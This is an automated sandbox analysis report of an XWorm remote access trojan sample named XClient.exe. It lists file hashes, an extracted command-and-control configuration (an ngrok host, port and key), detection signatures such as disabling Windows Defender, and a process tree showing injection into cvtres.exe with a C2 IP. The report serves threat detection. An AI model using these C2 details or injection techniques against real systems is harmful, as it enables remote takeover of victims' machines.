Analysis
-
max time kernel
1809s -
max time network
1824s -
platform
windows11-21h2_x64 -
resource
win11-20231215-en -
resource tags
-
submitted
20/12/2023, 05:27
General
-
Target
XClient.exe
-
Size
33KB
-
MD5
66bd8238a2177758528a96b77ea090cf
-
SHA1
17a6c0f87a9e17d4bd2220818cae3c6797a1b222
-
SHA256
73f6543eb0648b63f8f2f0920c3fd9d968d43c367758b45a6133dd181fa81e88
-
SHA512
ed3ee27edb2768dcf3ae71f37c451b495f518847f18bc997b92857ae15fb3bf410984ba1ff88272f6e0f3326273b2574d09946d2ea4c1135497c67069338aa54
-
SSDEEP
384:6E8PQ9Ba+vNuntf98d6ILj7CM42pfL3iB7OxVqWmRApkFXBLTsOZwpGN2v99IkuY:EUa+vNohsXn42JiB70cVF49jeOjhabs
Malware Config
Extracted
xworm
5.0
2.tcp.ngrok.io:19809
cuIs5agEciWOTAUC
-
install_file
USB.exe
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
Detect Xworm Payload 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies Internet Explorer settings 1 TTPs 4 IoCs
-
Modifies registry class 21 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of FindShellTrayWindow 26 IoCs
-
Suspicious use of SendNotifyMessage 12 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 3.131.207.170 19809 <123456789> 1BBCB829C0D6F36B316D2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text4⤵
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff6d683cb8,0x7fff6d683cc8,0x7fff6d683cd82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,12326927277977282859,74181479509542840,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1872 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,12326927277977282859,74181479509542840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,12326927277977282859,74181479509542840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2524 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12326927277977282859,74181479509542840,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12326927277977282859,74181479509542840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12326927277977282859,74181479509542840,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12326927277977282859,74181479509542840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12326927277977282859,74181479509542840,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12326927277977282859,74181479509542840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,12326927277977282859,74181479509542840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4796 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12326927277977282859,74181479509542840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,12326927277977282859,74181479509542840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6084 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,12326927277977282859,74181479509542840,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1892 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004DC 0x00000000000004C81⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5ab16bd4ff2a8053c32cae8e2c4d25a66
SHA1c1e041f30745a24f337adae3f4561d0f94f9e7cf
SHA2565bafe572e81800f2a0bcd73872edb58a34972bf6134fac1432bdda1b7c0ebb70
SHA512e4d7ee26645efa73e97b3453de0a3cf4a2374f758f625fac76e074c90413ad22fe17183e1611d5262cd1012da41a8d80b9718912af6bd5d807f4e972f591e69d
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
180B
MD500a455d9d155394bfb4b52258c97c5e5
SHA12761d0c955353e1982a588a3df78f2744cfaa9df
SHA25645a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed
SHA5129553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f
-
Filesize
4KB
MD5ad2b79cdf41cad88058e89dc5b87ee48
SHA1b58d850c4347a2cc17a5d6a9721f9b99dd8def51
SHA256d2d88ed359513690949c52a980ecba3df16dcf19451c9df28cdb810effa00d6a
SHA512f1b6255ab9a02926156ffff3178f381a66ada81724b4de63cc884c5902fd13c72fcde62ca7ca75a0e13752331a9f3e3413dfbecf92f2ded512b90b5bf7112dd0
-
Filesize
5KB
MD5d2b979fd3d2a775329acf39926cbaa2d
SHA188ae72ddb866e7a02806c81a6bc6618da680d052
SHA25692c05fc0ce8927da270d4b59bf9ca55e0412c135d0ed2d8b2a2dc77c042dd2cf
SHA5123204512e409c0e53fb6ab04f0e3b7f8c0db7169433e36c80069b4ce07ad163fa1cb9975b86df4e54f4c6ea96b9fff797d16881f87cc665b7ae8226d80d29ed75
-
Filesize
5KB
MD5785da264c4d0ff388664c601324f4196
SHA1feeac4987f6933a00c0a325033ad488278c6cf48
SHA256dfa698ce17b6b19dd30c80b919db4e04d94a3928a73cc0c90f445dd06351a435
SHA51270af1cb2b15e69446b244c464a5e602c1964f441ef9c1178bed5c163ec85433f382fa1c7c64332c23a0f87b6d5f0c94b85c610bcb62c7eba0beabf3dfa3d6b99
-
Filesize
5KB
MD5bb7c182a3e71a650cca26edadcaf996c
SHA11068488ce25a118fa1a8d66175b52948fa2968c5
SHA25603a3610659ddea8c6117c9ac808a8ddaeee57804d34a05c24fed43c029a79653
SHA512c15aa3dcdbd3092a104e35ebfd0df6836433f451ba4b6562e305674913ced5872ea38f9566136a0e7d6ac82925be40bc6c545dca0c4583a2bb524e213ef958b7
-
Filesize
5KB
MD514b4aa17fd125844b972e06fc5e273a8
SHA16063cd98c07670df64b6e59d3e76423dfa1ba43d
SHA256423b262cd5dee00675b5d39a3dcb58b85395164e640d7a702cb8ae7b24fcc490
SHA51219e28dcbec6b4322b1892e106381da9e02e905660e3ad5ae02d59230daa7885fb9d3baf8ed7c63ba1ecd5ef6e6ce572a3068089f045ed9ff834eb051f9753e2b
-
Filesize
25KB
MD5ac2b1e1028003f95bdb29d2cc74186dc
SHA1b3d75c41f59e96148e07ba1c10d27f67adfc5d79
SHA2568b5480e0e913fbfd94380c8b791244d03a71a0d054950836441425e1727ba383
SHA5122b43d48f809212b459e53284446f0dfb23de64cbd251dd76350115910b11e4605469ddb41f2bd31aa9a98e652790d6928adee38b39d4fc4e9107e6a4f7d20e68
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
10KB
MD51ce20384353e4d9269d327897f151bf9
SHA11daff8ee82c8a99a159e2e4023c43115a8813581
SHA2566d83f56a548550c03b10bfc3430e8b7f8f53599e0e37465c31d453d0485c1a86
SHA512789dfccf9bbf8a419f316e93732f67c4f02984527a22b4b8e89be29f48b576057256f92041710ebfd4134f274031747951cc3d6b48324c994406f1afc034947c
-
Filesize
10KB
MD51084a99507736e0c0ae2afd707002694
SHA17eeaa22638b2c305a1590e1e4aa00f11f57804ac
SHA2561f6190564c28db525c2cc0f145b3ff387f32a4865d893398ae5e5dede167d139
SHA51268fc40990de08e00b4610f0f0b5da26f84ff7f65bc52c224c3b22b48e6181f6d82cf96a73ba860daebd4d4d242429955f95df11faab5445752ec4ddb9ec01e6b
-
Filesize
14KB
MD50aa91f525c15e1be778d806cfa805c9d
SHA178968a60c840fac403adb84d4a2aacb6325fbcb1
SHA256543b3143eb5b043a619fd0b963844806761547a5e701826a4e52bf68f5c14932
SHA512329e0dffd5adaa610292220790c2c4d30e9caeda8084dac759fd4cb24fdd54c663711c79d457c5913e2c0c78496c087f4fc786ec0dcca45ea3ab7ef31fddd44b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
280KB
-
Filesize
52KB
-
Filesize
64KB
-
Filesize
280KB
-
Filesize
40KB
-
Filesize
56KB
-
Filesize
136KB
-
Filesize
56KB
-
Filesize
44KB
-
Filesize
40KB
-
Filesize
36KB
-
Filesize
48KB
-
Filesize
120KB
-
Filesize
64KB
-
Filesize
88KB
-
Filesize
64KB
-
Filesize
48KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
216KB
-
Filesize
6.2MB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
408KB
-
Filesize
5.6MB
-
Filesize
624KB
-
Filesize
584KB
-
Filesize
64KB
-
Filesize
7.7MB